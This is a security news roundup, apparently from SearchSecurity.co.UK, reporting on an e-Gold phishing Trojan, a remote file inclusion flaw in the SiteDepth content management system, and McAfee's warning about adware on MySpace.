According to the SANS Internet Storm Center, an emerging email scam could result in end-users' computers becoming infected by a string of malicious files.
In a posting to the ISC Handler's Diary Sunday,
Requires Free Membership to View
SearchSecurity.co.UK members gain immediate and unlimited access to breaking UK industry news, virus alerts, new hacker threats, highly focused security newsletters, and more -- all at no cost. Join me on SearchSecurity.co.UK today!
Michael S. Mimoso, Editorial Director
ISC Director Marcus Sachs detailed the contents of an email that has started making the rounds in recent days.
The text of the message includes information about an alleged transaction involving e-Gold Ltd., an electronic payment site. The author attempts to convince the recipient that she lost currency from a transaction, but includes a screenshot detailing the problem called screen.zip. When opened, that file drops a series of executables and .dll files on a victim's machine, one of which includes a spyware-spreading Trojan that attempts to steal e-Gold account information.
Sachs said the issue and analysis were submitted to the ISC by a reader. "Readers… are the backbone of the SANS Internet Storm Center and we really appreciate those who send in their own analysis for us to turn around in alerts to others," Sachs said.
SiteDepth subject to .php vulnerability
The French Security Incident Responst Team (FrSIRT) is one of several organizations warning of a flaw in SiteDepth, a content management system used primarily by adult Web site operators, that could enable attackers to execute arbitrary commands.
Late last week FrSIRT warned of the issue, which was first reported by David "Aesthetico" Vieira-Kurz of German security firm Major Security.
"This flaw is due to an input validation error in the 'constants.php' script that fails to validate the 'SD_DIR' parameter, which could be exploited by remote attackers to include malicious files and execute arbitrary commands with the privileges of the Web server," said FrSIRT.
The issue affects SiteDepth version 3.0.1 and prior. A patch has not yet been issued by the vendor.
McAfee warns of adware on MySpace
Social networking site MySpace may be popular among young and old alike, but not all the media clips being shared there are for harmless fun.
In its Avert Labs Blog, antivirus vendor McAfee Inc. warned that not only have a pair of MySpace viruses circulated this year, but it's also become a hotbed for adware.
More specifically, McAfee's Allysa Myers noted the recent Washington Post report that an advertisement posted on MySpace used the Windows Meta File (WMF) exploit that Microsoft patched earlier this year to install adware. Plus, another organization has reportedly created fake MySpace profiles to increase adware installations.
That means harmless MySpace surfing during the workday may not be so harmless after all. "There's really nothing to prevent profiles being created for questionable purposes," Myers wrote.